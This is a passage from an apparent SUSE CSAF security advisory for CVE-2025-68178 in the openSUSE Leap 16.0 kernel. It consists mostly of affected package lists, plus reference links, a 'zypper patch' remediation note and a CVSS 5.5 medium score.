"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68178",
"url": "https://www.suse.com/security/cve/CVE-2025-68178"
},
{
"category": "external",
"summary": "SUSE Bug 1255266 for CVE-2025-68178",
"url": "https://bugzilla.suse.com/1255266"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
